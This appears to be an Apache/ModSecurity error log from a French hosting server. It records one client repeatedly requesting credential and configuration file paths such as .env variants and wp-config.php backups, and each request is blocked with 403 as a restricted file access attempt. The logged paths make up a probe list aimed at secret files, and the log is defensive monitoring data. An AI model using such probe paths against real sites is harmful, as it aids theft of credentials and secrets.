[Mon May 11 11:37:06.635817 2026] [security2:error] [pid 1254242:tid 1254253] [client 185.177.72.9:33896] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/templates/.env.debug_new"] [unique_id "agGjQr4KNmD_mZ_vlf8z5wAAAEg"]
[Mon May 11 11:37:07.865119 2026] [security2:error] [pid 1254242:tid 1254253] [client 185.177.72.9:33896] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjQr4KNmD_mZ_vlf8z5wAAAEg"]
[Mon May 11 11:37:07.891528 2026] [security2:error] [pid 1254179:tid 1254195] [client 185.177.72.9:33902] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /templates/.env.tmp_development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/templates/.env.tmp_development"] [unique_id "agGjQ2S6k_SCYd1AVZqqDAAAAQ4"]
[Mon May 11 11:37:07.891716 2026] [security2:error] [pid 1254179:tid 1254195] [client 185.177.72.9:33902] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/templates/.env.tmp_development"] [unique_id "agGjQ2S6k_SCYd1AVZqqDAAAAQ4"]
[Mon May 11 11:37:09.046806 2026] [security2:error] [pid 1254179:tid 1254195] [client 185.177.72.9:33902] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjQ2S6k_SCYd1AVZqqDAAAAQ4"]
[Mon May 11 11:37:09.073935 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:33916] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /templates/.env.tmp_development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/templates/.env.tmp_development"] [unique_id "agGjRURdw2n9wv6Ai48DVgAAAJg"]
[Mon May 11 11:37:09.074315 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:33916] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/templates/.env.tmp_development"] [unique_id "agGjRURdw2n9wv6Ai48DVgAAAJg"]
[Mon May 11 11:37:10.309646 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:33916] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjRURdw2n9wv6Ai48DVgAAAJg"]
[Mon May 11 11:37:15.175830 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:60554] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env.backup.copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/test/.env.backup.copy"] [unique_id "agGjS0YQeUtAPynIs6xTvQAAAAU"]
[Mon May 11 11:37:15.180135 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:60554] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/test/.env.backup.copy"] [unique_id "agGjS0YQeUtAPynIs6xTvQAAAAU"]
[Mon May 11 11:37:16.353793 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:60554] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjS0YQeUtAPynIs6xTvQAAAAU"]
[Mon May 11 11:37:16.379702 2026] [security2:error] [pid 1254133:tid 1254146] [client 185.177.72.9:60558] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env.backup.copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/test/.env.backup.copy"] [unique_id "agGjTBjZymfuKpjWXeh4PgAAAMo"]
[Mon May 11 11:37:16.379910 2026] [security2:error] [pid 1254133:tid 1254146] [client 185.177.72.9:60558] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/test/.env.backup.copy"] [unique_id "agGjTBjZymfuKpjWXeh4PgAAAMo"]
[Mon May 11 11:37:17.653452 2026] [security2:error] [pid 1254133:tid 1254146] [client 185.177.72.9:60558] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjTBjZymfuKpjWXeh4PgAAAMo"]
[Mon May 11 11:37:17.681093 2026] [security2:error] [pid 1254242:tid 1254260] [client 185.177.72.9:60574] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env.tmp2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/test/.env.tmp2"] [unique_id "agGjTb4KNmD_mZ_vlf8z8wAAAE8"]
[Mon May 11 11:37:17.681361 2026] [security2:error] [pid 1254242:tid 1254260] [client 185.177.72.9:60574] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/test/.env.tmp2"] [unique_id "agGjTb4KNmD_mZ_vlf8z8wAAAE8"]
[Mon May 11 11:37:18.864613 2026] [security2:error] [pid 1254242:tid 1254260] [client 185.177.72.9:60574] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjTb4KNmD_mZ_vlf8z8wAAAE8"]
[Mon May 11 11:37:18.887732 2026] [security2:error] [pid 1254179:tid 1254203] [client 185.177.72.9:60584] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env.tmp2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/test/.env.tmp2"] [unique_id "agGjTmS6k_SCYd1AVZqqGgAAARY"]
[Mon May 11 11:37:18.887939 2026] [security2:error] [pid 1254179:tid 1254203] [client 185.177.72.9:60584] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/test/.env.tmp2"] [unique_id "agGjTmS6k_SCYd1AVZqqGgAAARY"]
[Mon May 11 11:37:20.101053 2026] [security2:error] [pid 1254179:tid 1254203] [client 185.177.72.9:60584] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjTmS6k_SCYd1AVZqqGgAAARY"]
[Mon May 11 11:37:27.449546 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:57152] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /testing/wp-config.php_debug"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/testing/wp-config.php_debug"] [unique_id "agGjV0YQeUtAPynIs6xTzwAAABQ"]
[Mon May 11 11:37:27.449785 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:57152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/testing/wp-config.php_debug"] [unique_id "agGjV0YQeUtAPynIs6xTzwAAABQ"]
[Mon May 11 11:37:29.642088 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:57152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjV0YQeUtAPynIs6xTzwAAABQ"]
[Mon May 11 11:37:29.666285 2026] [security2:error] [pid 1256241:tid 1256265] [client 185.177.72.9:57162] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /testing/wp-config.php_debug"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/testing/wp-config.php_debug"] [unique_id "agGjWZkIEwRJMyDaV55KBAAAAVM"]
[Mon May 11 11:37:29.666495 2026] [security2:error] [pid 1256241:tid 1256265] [client 185.177.72.9:57162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/testing/wp-config.php_debug"] [unique_id "agGjWZkIEwRJMyDaV55KBAAAAVM"]
[Mon May 11 11:37:30.880363 2026] [security2:error] [pid 1256241:tid 1256265] [client 185.177.72.9:57162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjWZkIEwRJMyDaV55KBAAAAVM"]
[Mon May 11 11:37:30.907256 2026] [security2:error] [pid 1254179:tid 1254191] [client 185.177.72.9:57166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tests/.env.copy-new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/tests/.env.copy-new"] [unique_id "agGjWmS6k_SCYd1AVZqqIQAAAQo"]
[Mon May 11 11:37:30.907471 2026] [security2:error] [pid 1254179:tid 1254191] [client 185.177.72.9:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/tests/.env.copy-new"] [unique_id "agGjWmS6k_SCYd1AVZqqIQAAAQo"]
[Mon May 11 11:37:32.078334 2026] [security2:error] [pid 1254179:tid 1254191] [client 185.177.72.9:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjWmS6k_SCYd1AVZqqIQAAAQo"]
[Mon May 11 11:37:32.101343 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:57176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tests/.env.copy-new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/tests/.env.copy-new"] [unique_id "agGjXERdw2n9wv6Ai48DdgAAAJg"]
[Mon May 11 11:37:32.101546 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:57176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/tests/.env.copy-new"] [unique_id "agGjXERdw2n9wv6Ai48DdgAAAJg"]
[Mon May 11 11:37:33.314577 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:57176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjXERdw2n9wv6Ai48DdgAAAJg"]
[Mon May 11 11:37:33.340535 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.177.72.9:59510] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tests/.env.test.copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/tests/.env.test.copy"] [unique_id "agGjXUYQeUtAPynIs6xT0gAAABU"]
[Mon May 11 11:37:33.341047 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.177.72.9:59510] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/tests/.env.test.copy"] [unique_id "agGjXUYQeUtAPynIs6xT0gAAABU"]
[Mon May 11 11:37:34.500372 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.177.72.9:59510] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjXUYQeUtAPynIs6xT0gAAABU"]
[Mon May 11 11:37:34.526547 2026] [security2:error] [pid 1254133:tid 1254148] [client 185.177.72.9:59526] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tests/.env.test.copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/tests/.env.test.copy"] [unique_id "agGjXhjZymfuKpjWXeh4UgAAAMw"]
[Mon May 11 11:37:34.526751 2026] [security2:error] [pid 1254133:tid 1254148] [client 185.177.72.9:59526] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/tests/.env.test.copy"] [unique_id "agGjXhjZymfuKpjWXeh4UgAAAMw"]
[Mon May 11 11:37:35.750303 2026] [security2:error] [pid 1254133:tid 1254148] [client 185.177.72.9:59526] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjXhjZymfuKpjWXeh4UgAAAMw"]
[Mon May 11 11:37:37.824363 2026] [autoindex:error] [pid 1254242:tid 1254247] [client 137.184.165.131:36802] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 11:37:40.426005 2026] [:error] [pid 1256241:tid 1256247] [client 137.184.165.131:47858] File does not exist: /home/totalcloud/public_html/index.php, referer: https://ftp.pole-de-mobilite-regional.com/
[Mon May 11 11:37:56.000714 2026] [ssl:error] [pid 1254242:tid 1254256] (EAI 2)Name or service not known: [client 116.202.235.23:45190] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:37:56.003984 2026] [ssl:error] [pid 1254242:tid 1254256] AH01941: stapling_renew_response: responder error
